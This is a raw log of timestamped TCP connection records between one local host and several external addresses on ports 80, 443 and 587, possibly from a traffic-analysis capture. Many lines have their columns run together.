                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:18.441970110 CET44349708198.252.105.91192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 08:12:18.441994905 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.442008972 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.449621916 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.449637890 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.449682951 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.449692011 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.449717999 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.449749947 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.457806110 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.457838058 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.457902908 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.457922935 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.457937956 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.457966089 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.465935946 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.465955019 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.466038942 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.466073036 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.466120958 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.467148066 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.467215061 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.468256950 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.468311071 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.468312979 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.468362093 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.473368883 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.473395109 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:18.473411083 CET  49708        443        192.168.2.10    198.252.105.91
Nov 26, 2024 08:12:18.473417997 CET  443          49708      198.252.105.91  192.168.2.10
Nov 26, 2024 08:12:26.942073107 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:27.062170982 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:27.062335968 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:27.092875957 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:27.092942953 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:27.214463949 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:27.214612961 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:28.466295958 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:28.466324091 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:28.466398954 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:28.491199017 CET  49744        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:28.611072063 CET  80           49744      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:29.884097099 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:30.004648924 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:30.004734993 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:30.031168938 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:30.031202078 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:30.151141882 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:30.151161909 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:30.265887022 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:30.385844946 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:30.385946035 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:30.386816978 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:30.386866093 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:30.506944895 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:30.506957054 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:30.765309095 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:30.765361071 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:30.766614914 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:30.769396067 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:30.769417048 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:31.363255978 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:31.363328934 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:31.363416910 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:31.399702072 CET  49753        80         192.168.2.10    54.244.188.177
Nov 26, 2024 08:12:31.519682884 CET  80           49753      54.244.188.177  192.168.2.10
Nov 26, 2024 08:12:32.036952972 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.037067890 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.104078054 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.104110956 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.104619980 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.247508049 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.339689970 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.387336016 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.504640102 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:32.504720926 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:32.504775047 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.507133961 CET  49757        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.627341986 CET  80           49757      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:32.635953903 CET  49764        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.674381971 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.674477100 CET  443          49759      104.26.13.205   192.168.2.10
Nov 26, 2024 08:12:32.674530029 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.720561028 CET  49759        443        192.168.2.10    104.26.13.205
Nov 26, 2024 08:12:32.756288052 CET  80           49764      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:32.756402969 CET  49764        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.809432030 CET  49764        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.809432030 CET  49764        80         192.168.2.10    18.141.10.107
Nov 26, 2024 08:12:32.930562973 CET  80           49764      18.141.10.107   192.168.2.10
Nov 26, 2024 08:12:32.930592060 CET  80           49764      18.141.10.107   192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.505306959 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.625250101 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.625389099 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.631994009 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.631994009 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.752192974 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:33.752202034 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:34.923429966 CET804976418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:34.923718929 CET804976418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:34.923772097 CET4976480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.020242929 CET4976480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.077266932 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.077337980 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.077387094 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.084783077 CET4976680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.141367912 CET804976418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.205063105 CET804976654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.661683083 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.921946049 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.922040939 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.924395084 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.924443960 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.982799053 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.045902967 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.045917988 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104183912 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104270935 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104492903 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.104509115 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.230093956 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.230108023 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.798679113 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.918776989 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.918853045 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.297108889 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.297219992 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.297482014 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.326651096 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.326770067 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.326868057 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.375411034 CET4977380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.386605024 CET4977280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.495356083 CET804977344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.507004976 CET804977254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.238048077 CET4978080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.241041899 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.241247892 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.358042002 CET8049780172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.358119011 CET4978080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.361126900 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.366269112 CET4978080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.366298914 CET4978080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.486135960 CET8049780172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.486175060 CET8049780172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.654290915 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.654443026 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.774348021 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.064027071 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.064507961 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.083797932 CET4978180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.184447050 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.204034090 CET804978144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.204158068 CET4978180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.250987053 CET4978180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.251013041 CET4978180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.371126890 CET804978144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.371181011 CET804978144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.479444027 CET5874977451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.479470968 CET5874977451.195.88.199192.168.2.10
Nov 26, 2024 08:12:39.479482889 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:39.479525089 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:39.573771000 CET  80     49780  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:39.574131012 CET  49780  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.577286005 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:39.578723907 CET  49780  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.649525881 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.697997093 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:39.699583054 CET  80     49780  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:39.769539118 CET  80     49782  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:39.769618034 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.803112984 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.803149939 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:39.923260927 CET  80     49782  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:39.923276901 CET  80     49782  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:39.986864090 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:39.993133068 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:40.113759995 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:40.394444942 CET  80     49781  44.221.84.105    192.168.2.10
Nov 26, 2024 08:12:40.394531965 CET  80     49781  44.221.84.105    192.168.2.10
Nov 26, 2024 08:12:40.394614935 CET  49781  80     192.168.2.10     44.221.84.105
Nov 26, 2024 08:12:40.402098894 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:40.412329912 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:40.532213926 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:40.623177052 CET  49781  80     192.168.2.10     44.221.84.105
Nov 26, 2024 08:12:40.745327950 CET  80     49781  44.221.84.105    192.168.2.10
Nov 26, 2024 08:12:40.822081089 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:40.823072910 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:40.944348097 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:40.988231897 CET  80     49782  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:40.988292933 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:40.991662979 CET  49782  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:41.112540007 CET  80     49782  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:41.241619110 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:41.242233992 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:41.363189936 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:41.388092041 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:41.508882999 CET  80     49788  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:41.508975029 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:41.513254881 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:41.513278961 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:41.635726929 CET  80     49788  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:41.636097908 CET  80     49788  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:41.652304888 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:41.652621984 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:41.774677038 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.069093943 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.069312096 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:42.191278934 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.297159910 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:42.418720007 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:42.419059038 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:42.421621084 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:42.421621084 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:42.479121923 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.479820013 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:42.479885101 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:42.479909897 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:42.479933977 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:42.541667938 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:42.541704893 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:42.599930048 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.599971056 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.599976063 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.600008965 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:42.733391047 CET  80     49788  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:42.733453035 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:42.785160065 CET  49788  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:42.905081034 CET  80     49788  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:42.976788044 CET  587    49774  51.195.88.199    192.168.2.10
Nov 26, 2024 08:12:43.142925024 CET  49774  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:12:44.585103035 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:44.585304022 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:44.585377932 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:44.660573006 CET  49790  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:44.781181097 CET  80     49790  18.141.10.107    192.168.2.10
Nov 26, 2024 08:12:45.584086895 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:45.704010963 CET  80     49797  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:45.704118967 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:45.742147923 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:45.742712975 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:45.862111092 CET  80     49797  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:45.862613916 CET  80     49797  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:46.878623962 CET  80     49797  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:46.878726006 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:46.953551054 CET  49797  80     192.168.2.10     172.234.222.143
Nov 26, 2024 08:12:47.073488951 CET  80     49797  172.234.222.143  192.168.2.10
Nov 26, 2024 08:12:47.912549019 CET  49803  80     192.168.2.10     18.141.10.107
Nov 26, 2024 08:12:48.032783031 CET  80     49803  18.141.10.107    192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.033176899 CET4980380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.107767105 CET4980380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.108041048 CET4980380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.228357077 CET804980318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:48.228636980 CET804980318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.105474949 CET804980318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.105559111 CET804980318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.105612993 CET4980380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.119064093 CET4980380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.238919020 CET804980318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.425843000 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.545723915 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.545835018 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.546036959 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.546060085 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.665951967 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:52.665968895 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.181957960 CET49774587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.825027943 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.825073957 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.825161934 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.879410028 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:59.879431963 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.571105957 CET4983180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691179991 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691278934 CET4983180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691529036 CET4983180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.691556931 CET4983180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.811606884 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.811666965 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.099335909 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.099610090 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.101747036 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.101757050 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.102073908 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.153362036 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.185945988 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.227325916 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.538867950 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.538949013 CET44349826104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.539083004 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:01.542434931 CET49826443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.146298885 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.146316051 CET804983154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.146377087 CET4983180192.168.2.1054.244.188.177
